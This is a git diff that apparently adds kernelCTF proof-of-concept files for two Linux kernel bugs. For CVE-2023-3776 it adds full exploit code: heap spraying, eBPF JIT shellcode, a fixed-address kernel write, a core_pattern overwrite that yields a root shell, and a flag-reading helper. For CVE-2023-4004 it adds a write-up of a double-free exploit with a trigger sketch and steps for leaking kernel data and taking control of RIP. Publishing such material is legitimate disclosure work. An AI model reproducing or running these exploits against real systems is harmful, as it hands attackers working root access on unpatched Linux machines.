Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.o differ
diff --git
a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s new file mode 100644 index 00000000..f437a8e3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/foo.s @@ -0,0 +1,25 @@ +section .text + global write_to_cpu_entry_area + global handle +write_to_cpu_entry_area: + mov rsp,rdi + pop r15 + pop r14 + pop r13 + pop r12 + pop rbp + pop rbx + pop r11 + pop r10 + pop r9 + pop r8 + pop rax + pop rcx + pop rdx + pop rsi + pop rdi + div qword [0x1234000] + + + + diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 new file mode 100755 index 00000000..060aff4d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip0 differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 new file mode 100755 index 00000000..e59a56ac Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/ip1 differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc new file mode 100755 index 00000000..cd459eb8 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c new file mode 100644 index 00000000..55d79687 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c @@ -0,0 +1,306 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + +#define PAUSE \ + { \ + printf(":"); \ + int x; \ + read(0, &x, 1); \ + } +extern void write_to_cpu_entry_area(void *buf); +void handle(int s) {} +void set_cpu(int i) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} +int cfd[2]; +int sfd[0x200][2]; +char payload[0x1000]; +char buf[0x1000]; +struct sock_filter filter[0x1000]; +int stopfd[2]; +const int DRR_CLASS_SPRAY_THREADS = 0x100; + +void *job(void *x) +{ + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + set_cpu(0); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = { + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x80}; + sendmsg(sfd[idx][1], &mhdr, 0); +} + +void do_spray() +{ + memset(payload,0,0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x400; + first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg + first->cmsg_type = 0x41414141; + + /* Try to overwrite struct drr_class's qdisc at offset 0x60 */ + /* That address is at CPU#1 cpu_entry_area's entry_stack_page (stack address) while it try to push r15 in function error_entry*/ + *(size_t*)&payload[0x60] = 0xfffffe000003df58; + + for (int i = 0; i < DRR_CLASS_SPRAY_THREADS; i++) + { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + 
setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + pthread_t tid; + for (int i = 0; i < DRR_CLASS_SPRAY_THREADS; i++) + pthread_create(&tid, 0, job, (void*)(size_t)i); + read(cfd[1], buf, DRR_CLASS_SPRAY_THREADS); +} + +int sc(void) +{ + set_cpu(1); + unsigned int prog_len = 0x900; + /* In current environment, the max instructions in a program is near 0x900 + And we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably + */ + struct sock_filter table[] = { + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, + {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}}; + +/* 0xb3909090 is NOPsled shellclode to make exploitation more reliable +90 nop +90 nop +90 nop +b3 b8 mov bl, 0xb8 +*/ + for (int i = 0; i < prog_len; i++) + filter[i] = table[0]; + + filter[prog_len - 1] = table[1]; + int idx = prog_len - 2; + +#include "sc.h" + + struct sock_fprog prog = { + .len = prog_len, + .filter = filter, + }; + int fd[2]; + for (int k = 0; k < 0x50; k++) + { + if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit. + { + close(stopfd[1]); + for (int i = 0; i < 0x100; i++) + { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd)); + SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog))); + } + write(stopfd[0], buf, 1); + read(stopfd[0], buf, 1); + exit(0); + } + } + /* wait for all forks to finish spraying BPF code */ + read(stopfd[1], buf, 0x50); +} +char POC[0x1000]; + +// the payload generated from `tc class delete dev lo classid 1:10` +// to generate payload from `tc` command, we can breakpoint at `netlink_sendmsg` +// after `tc` command is run, and we can dump the payload using this gdb command: +// dump binary memory /tmp/tc_del msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len +// refs: https://man7.org/linux/man-pages/man7/rtnetlink.7.html https://wiki.slank.dev/book/types.html +size_t DEL[] = { + 0x0005002900000024, 0x00000000649bcb96, + 0x0000000100000000, 0x0001000000010010, + 0x0000000000000000}; + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp, ret; + char edit[0x100]; + ret = unshare(CLONE_NEWNET | CLONE_NEWUSER); + if (ret < 0) + { + perror("unshare"); + } + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + return; +} + +int main(int argc, char **argv) +{ + if (fork() == 0) // this process is used to find our process by `pidof billy` + { + set_cpu(1); + strcpy(argv[0], "billy"); + while (1) + sleep(1); + } + if (fork() == 0) // this process is used to trigger core_pattern exploit + { + 
set_cpu(1); + setsid(); + crash(""); + } + setvbuf(stdout, 0, 2, 0); + unshare_setup(getuid(), getgid()); + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd); + struct rlimit rlim = { + .rlim_cur = 0xf000, + .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + // iptables-legacy -t mangle -A POSTROUTING -d 127.0.0.1/24 -j MARK --set-mark 1 + { + set_cpu(1); + int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); + int fd = open("./ip0", O_RDONLY); + int n = read(fd, buf, 0x1000); + setsockopt(s, 0, 64, buf, n); + fd = open("./ip1", O_RDONLY); + n = read(fd, buf, 0x1000); + setsockopt(s, 0, 65, buf, n); + set_cpu(0); + } + + char *core = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0); + strcpy(core, "|/proc/%P/fd/666"); // put payload string into known address which will used by ebpf shellcode + + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); // later use this socket to trigger vuln + set_cpu(1); + sc(); // spray ebpf program. + do_spray(); // prepare spray thread first. + set_cpu(0); + + /* + ip link set lo up + tc qdisc add dev lo root handle 1: drr + tc class add dev lo parent 1: classid 1:10 drr quantum 60 + tc filter add dev lo parent 1: pref 100 protocol ip handle 1 fw classid 1:10 + tc filter replace dev lo pref 100 protocol ip handle 1 fw classid 1:20 indev loo + */ + /* + generated using gdb command after breakpoint on netlink_sendmsg: + dump binary memory /tmp/POC msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len + */ + { + int poc_fd = open("./POC", O_RDONLY); + read(poc_fd, POC, 0x1000); + write(fd, POC, 0x1000); + } + + write(fd, DEL, 0x24); // tc class delete dev lo classid 1:10 + write(cfd[1], buf, 0x200); // spray kmalloc-0x80 to reallocate. + sleep(3); + + struct sockaddr_in addr = { + .sin_family = AF_INET, + .sin_port = htons(80), + .sin_addr.s_addr = inet_addr("127.0.0.1"), + }; + + size_t fake_qdisc_struct[0x10] = {}; + + /* Overwrite struct Qdisc's enqueue which is function ptr + struct Qdisc { + int (*enqueue)(struct sk_buff *, struct Qdisc *, struct sk_buff * *); + struct sk_buff * (*dequeue)(struct Qdisc *); + unsigned int flags; + */ + + fake_qdisc_struct[0] = 0xffffffffcc000000 - 0x800; + + /* + eBPF generated shellcode is lay in this range, we spray eBPF multiple times and summarize it's often near in this page. 
+ It's more reliabe we choose address in the middle of the page + ffffffffa0000000 |-1536 MB | fffffffffeffffff | 1520 MB | module mapping space + */ + + int c = socket(AF_INET, SOCK_DGRAM, 0); + + if (fork() == 0) // Put payload in fixed kernel address (CVE-2023-0597) + { + set_cpu(1); + signal(SIGFPE, handle); + signal(SIGTRAP, handle); + signal(SIGSEGV, handle); + setsid(); + write_to_cpu_entry_area(fake_qdisc_struct); + } + sleep(1); + /* Trigger Qdisc filter our packet and control kernel RIP */ + SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr))); +} diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz new file mode 100644 index 00000000..8ab7e2f5 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root new file mode 100755 index 00000000..8e589308 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c new file mode 100644 index 00000000..c71dffe8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c @@ -0,0 +1,43 @@ +#define _GNU_SOURCE /* See feature_test_macros(7) */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYS_pidfd_getfd 438 +char buf[0x100]; +char path[0x100]; +int res; +int fd; +int port; +char* ip; +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash","bash",NULL); + +} +int main(int argc,char** argv){ + job(0); + + +} diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh new file mode 100644 index 00000000..c3f781b1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/run.sh @@ -0,0 +1,5 @@ +#!/bin/sh +dd if=$0 of=/tmp/exp.tar.gz skip=1 +cd /tmp +tar -xf exp.tar.gz +./poc diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h new file mode 100644 index 00000000..ff8f028b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.h @@ -0,0 +1,51 @@ +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d0ff}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c14e7c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c70b740}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90ff31}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf02948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca0b640}; +filter[idx--] = (struct 
sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c4fb640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c64b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c00b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c909058}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d0ff}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c909050}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9030b2}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d231}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c10e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca0b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cd08948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf22948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ce0b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cc1b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf4b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c01b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cd78948}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cf20148}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c60b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ca4b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c5bb640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c08e6c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c01b640}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90f631}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3cc20148}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3ce2d348}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9020b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c931}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90320f}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c9082b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c18e1c1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c0b1}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90d231}; +filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = 0x3c90c931}; diff --git 
a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py
new file mode 100644
index 00000000..c7ebb63e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/sc.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+from pwn import *
+import struct
+
+entry_syscall = 0xffffffff82200000
+core_pattern = 0xffffffff837ba460
+copy_from_user = 0xffffffff8186e280
+msleep = 0xffffffff812292e0
+
+off1 = entry_syscall-core_pattern
+off2 = core_pattern-copy_from_user
+off3 = copy_from_user-msleep
+ins = ["sub", "add"]
+
+context.arch = 'amd64'
+
+ASM=f"""
+; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64
+; ECX should be MSR_LSTAR ( 0xc0000082 )
+xor ecx, ecx
+xor edx, edx
+mov cl, 0xc0
+shl ecx, 24
+mov cl, 0x82
+rdmsr
+; make rdx = entry_SYSCALL_64's address
+xor ecx, ecx
+mov cl, 32
+shl rdx, cl
+add rdx, rax
+; entry_SYSCALL_64 + 0x15a68e0 = core_pattern
+; move core_pattern to rdi ( 1st arg )
+xor esi,esi
+mov sil, {(abs(off1)>>24)&0xff}
+shl esi, 8
+mov sil, {(abs(off1)>>16)&0xff}
+shl esi, 8
+mov sil, {(abs(off1)>>8)&0xff}
+shl esi, 8
+mov sil, {(abs(off1))&0xff}
+{ins[off1<0]} rdx, rsi
+mov rdi, rdx
+; core_pattern - 0x1fe7cc0 = copy_from_user
+; move copy_from_user to rax
+xor esi,esi
+mov sil, {(abs(off2)>>24)&0xff}
+shl esi, 8
+mov sil, {(abs(off2)>>16)&0xff}
+shl esi, 8
+mov sil, {(abs(off2)>>8)&0xff}
+shl esi, 8
+mov sil, {(abs(off2))&0xff}
+{ins[off2<0]} rdx, rsi
+mov rax, rdx
+; call copy_from_user(core_pattern, user_buf, 0x30);
+; user_buf = 0xa00000 = "|/proc/%P/fd/666"
+xor esi, esi
+mov sil,0xa0
+shl esi,16
+xor edx,edx
+mov dl,0x30
+push rax
+call rax
+pop rax
+; copy_from_user - 0x63f6d0 = msleep
+xor esi, esi
+mov sil, {(abs(off3)>>24)&0xff}
+shl esi, 8
+mov sil, {(abs(off3)>>16)&0xff}
+shl esi, 8
+mov sil, {(abs(off3)>>8)&0xff}
+shl esi, 8
+mov sil, {(abs(off3))&0xff}
+{ins[off3<0]} rax, rsi
+; move 0x7000000 to rdi ( 1st arg )
+xor edi,edi
+mov dil,0x70
+shl edi,20
+call rax
+"""
+def toi(data):
+    assert len(data) == 4
+    return struct.unpack('<I', data)[0]
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md
+## The vulnerability
+In `nft_pipapo_remove` (net/netfilter/nft_set_pipapo.c), the end key of an element is read unconditionally:
+
+```
+static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+			      const struct nft_set_elem *elem)
+{
+	...
+		match_start = data;
+		match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
+
+		start = first_rule;
+		rules_fx = rules_f0;
+
+		nft_pipapo_for_each_field(f, i, m) {
+			if (!pipapo_match_field(f, start, rules_fx,
+						match_start, match_end))
+				break;
+...
+```
+
+But an NFT_SET_EXT_KEY_END extension is not necessarily present. The function `nft_pipapo_insert` shows the correct way to handle it:
+
+```
+	...
+	if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
+		end = (const u8 *)nft_set_ext_key_end(ext)->data;
+	else
+		end = start;
+	...
+```
+
+
+## Triggering the vulnerability
+
+It is easy to trigger by following these steps (a sketch of the crafted insert message follows this list):
+
+- Create a pipapo set
+- Insert an element into the set without NFT_SET_EXT_KEY_END
+- Flush the set (after this, the element will be freed but won't be removed from the set)
+- Flush the set again (after this, the element will be freed a second time)
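+
+The step that does the damage is the insert: the element carries a key but deliberately no end key. The sketch below shows the attribute layout of such an `NFT_MSG_NEWSETELEM` message using libmnl. It is schematic only: the attribute names come from `linux/netfilter/nf_tables.h`, but the nfnetlink batch wrapping (NFNL_MSG_BATCH_BEGIN/END), the creation of the table and of the concatenated-range set (NFT_SET_INTERVAL plus a multi-field NFTA_SET_DESC_CONCAT description, so the pipapo backend gets selected), and all error handling are omitted.
+
+```c
+#include <libmnl/libmnl.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+
+/* Sketch: build an NFT_MSG_NEWSETELEM message whose element carries
+ * NFTA_SET_ELEM_KEY but deliberately no NFTA_SET_ELEM_KEY_END.
+ * buf must be at least MNL_SOCKET_BUFFER_SIZE bytes. */
+static struct nlmsghdr *new_elem_without_key_end(char *buf, const void *key, int klen)
+{
+    struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf);
+    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
+    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+
+    struct nfgenmsg *nfg = mnl_nlmsg_put_extra_header(nlh, sizeof(*nfg));
+    nfg->nfgen_family = NFPROTO_IPV4;
+    nfg->version = NFNETLINK_V0;
+
+    mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_TABLE, "testtable");
+    mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_SET, "testset");
+
+    struct nlattr *list = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_LIST_ELEMENTS);
+    struct nlattr *elem = mnl_attr_nest_start(nlh, 1 /* element index */);
+
+    struct nlattr *k = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_KEY);
+    mnl_attr_put(nlh, NFTA_DATA_VALUE, klen, key);
+    mnl_attr_nest_end(nlh, k);
+    /* NFTA_SET_ELEM_KEY_END is intentionally absent here */
+
+    mnl_attr_nest_end(nlh, elem);
+    mnl_attr_nest_end(nlh, list);
+    return nlh;
+}
+```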
+```
+`tmpl->len` depends on user-supplied attributes such as NFTA_SET_ELEM_USERDATA, which means the element size is attacker-controlled. So you just need to find a structure suitable for leaking information and controlling RIP. I chose two nftables structures, `nft_table` and `nft_object`:
+```
+struct nft_table {
+	struct list_head		list;
+	struct rhltable			chains_ht;
+	struct list_head		chains;
+	struct list_head		sets;
+	struct list_head		objects;
+	struct list_head		flowtables;
+	u64				hgenerator;
+	u64				handle;
+	u32				use;
+	u16				family:6,
+					flags:8,
+					genmask:2;
+	u32				nlpid;
+	char				*name;
+	u16				udlen;
+	u8				*udata;
+};
+
+struct nft_object {
+	struct list_head		list;
+	struct rhlist_head		rhlhead;
+	struct nft_object_hash_key	key;
+	u32				genmask:2,
+					use:30;
+	u64				handle;
+	u16				udlen;
+	u8				*udata;
+	/* runtime data below here */
+	const struct nft_object_ops	*ops ____cacheline_aligned;
+	unsigned char			data[]
+		__attribute__((aligned(__alignof__(u64))));
+};
+```
+It is easy to spray the heap by creating many nft_table instances with NFTA_TABLE_USERDATA:
+```
+	...
+	if (nla[NFTA_TABLE_USERDATA]) {
+		table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
+		if (table->udata == NULL)
+			goto err_table_udata;
+
+		table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
+	}
+	...
+```
+And nft_object holds a pointer to a function table (`const struct nft_object_ops *ops`), which is useful both for leaking information and for controlling RIP.
+
+The object size differs per object type. I chose the `NFT_OBJECT_CT_EXPECT` object, whose allocation lands in kmalloc-192.
+### Leak info
+
+I leak the needed information with the following steps (a condensed code sketch follows the Control RIP list below):
+
+- Create pipapo `set A`
+- Insert `element B` into `set A` without NFT_SET_EXT_KEY_END (make sure sizeof(`element B`) > 192 && sizeof(`element B`) < 256)
+- Flush `set A`; `element B` will be freed but won't be removed
+- Create many tables with NFTA_TABLE_USERDATA to reclaim `element B`'s chunk; the length of `NFTA_TABLE_USERDATA` should equal sizeof(`element B`)
+- Flush `set A` again; `element B` will be freed again but still won't be removed
+- Create many objects whose size equals sizeof(`element B`); one of them will reclaim `element B`'s chunk
+- Dump/Get all the tables we sprayed; the `NFTA_TABLE_USERDATA` of one of them now contains the structure of an object
+
+### Control RIP
+I control RIP with the following steps, which closely mirror the leak procedure:
+
+- Create pipapo `set A`
+- Insert `element B` into `set A` without NFT_SET_EXT_KEY_END (make sure sizeof(`element B`) > 192 && sizeof(`element B`) < 256)
+- Flush `set A`; `element B` will be freed but won't be removed
+- Create many tables with NFTA_TABLE_USERDATA to reclaim `element B`'s chunk; the length of `NFTA_TABLE_USERDATA` should equal sizeof(`element B`)
+- Flush `set A` again; `element B` will be freed again but still won't be removed
+- Create many objects with `NFTA_OBJ_USERDATA`, each of size sizeof(`element B`); the `NFTA_OBJ_USERDATA` of the object will later hold the ROP chain
+- Dump/Get all the tables we sprayed and find the target table: the one whose `NFTA_TABLE_USERDATA` contains the structure of an object
+- Delete the target table to free the object's chunk
+- Spray many tables with NFTA_TABLE_USERDATA to reclaim the object's chunk and fill it with fake object data; I overwrite object->ops to control RIP
+- Get the target object, and we finally jump to the ROP chain
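+
+The two lists above compress several moving parts, so here is a minimal C sketch of the leak stage. It assumes the helper functions defined later in this PR (new_table, new_set, new_setelem, elem_flush, spray_tables, new_obj_ct_expect, get_table) and a libnl socket already connected to NETLINK_NETFILTER; the set name, table-naming scheme, spray counts and the 0xc8 padding size are illustrative assumptions, not the exact values from exploit.c:
+
+```
+// Sketch only: double-free element B, reclaim it twice, then hunt for the
+// table whose userdata has turned into a struct nft_object.
+void leak_stage(struct nl_sock *sk) {
+    char pad[0xc8] = {0};   // pads the element into kmalloc-256 (>192, <256)
+    char name[0x20];
+
+    new_table(sk, SET_TABLE);
+    new_obj_ct_expect(sk, SET_TABLE, OBJ_FOR_REF, NULL, 0); // referenced by the element
+    new_set(sk, SET_TABLE, "set-a", NFT_OBJECT_CT_EXPECT);  // pipapo set (INTERVAL|CONCAT)
+    new_setelem(sk, SET_TABLE, "set-a", pad, sizeof(pad));  // element B, no KEY_END
+
+    elem_flush(sk, SET_TABLE, "set-a");       // free #1: element B stays linked
+    spray_tables(sk, 100, pad, sizeof(pad));  // table->udata reclaims element B
+    elem_flush(sk, SET_TABLE, "set-a");       // free #2: frees a live table->udata
+
+    for (int i = 0; i < 100; i++) {           // ct_expect objects reclaim it again
+        snprintf(name, sizeof(name), "obj%d", i);
+        new_obj_ct_expect(sk, SET_TABLE, name, NULL, 0);
+    }
+
+    // Dump the sprayed tables; nl_callback_find_target_table() spots the one
+    // whose userdata now starts with a kernel pointer (the object's ops).
+    nl_socket_modify_cb(sk, NL_CB_VALID, NL_CB_CUSTOM,
+                        nl_callback_find_target_table, NULL);
+    for (int i = 0; i < 100 && !target_table; i++) {
+        snprintf(name, sizeof(name), "table%d", i); // must match spray_tables' names
+        get_table(sk, name);
+        nl_recvmsgs_default(sk);
+    }
+}
+```
+
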